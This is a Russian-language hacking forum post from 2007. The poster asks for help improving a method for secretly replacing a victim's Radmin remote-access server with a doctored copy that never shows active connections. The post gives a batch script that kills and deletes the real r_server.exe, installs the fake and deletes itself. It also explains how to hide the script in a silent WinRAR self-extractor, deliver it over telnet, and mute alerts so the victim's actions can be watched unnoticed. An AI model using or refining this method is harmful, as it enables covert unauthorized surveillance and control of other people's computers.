
02.05.2007, 19:24
|
|
Познающий
Регистрация: 10.12.2006
Сообщений: 40
Провел на форуме: 813492
Репутация:
21
|
|
Помогите доработать способ подмены настоящего файла радмины на поддельный, чтоб не пропалили.
Вобщем забацал я сервак радмина так что он при любом подключении синего цвета и даже если на него нажать он все равно пишет Нет соединений. Теперь надо подменить реальный на мой. Я делал так:
taskkill /im r_server.exe /f
del C:\WINDOWS\system32\r_server.exe
.
.
{эту строку я продублировал 100 раз}
.
.
del C:\WINDOWS\system32\r_server.exe
copy /y "r_server.exe" "%SYSTEMROOT%\system32\r_server.exe"
"%SYSTEMROOT%\system32\r_server.exe" /start
del C:\r_server.exe
del C:\start.bat
Затем сохраняю его с именем start.bat, пакую батник и мой файл сервака винраром в sfx. При упаковке настраиваю чтоб распаковывался на диск С. Ставлю галочку Скрывать все и перезаписывать существующие фалы.
Остается только приконектится к жертве через телнет и перепись файлов (ПРИ ЭТИХ ПОДКЛЮЧЕНИЯХ ЦВЕТ ИКОНКИ РАДИНА НЕ МЕНЯЕТСЯ). Закидываю файл, запускаю и отсоединяюсь. Через секунд 15 обратно присоединяюсь через Перепись файлов и снова копирую файл r_server.exe чтобы проверить подменился он или нет. Если это мой то все олично. Отключаю звук при подключении и можно смело наблюдать за действиями пользователя. Всегда когда я так делал все работало, НО на одном компе это не проходит. Не могу понять почему. Может кто подскажет как усовершенствовать этот метод?
|
|
|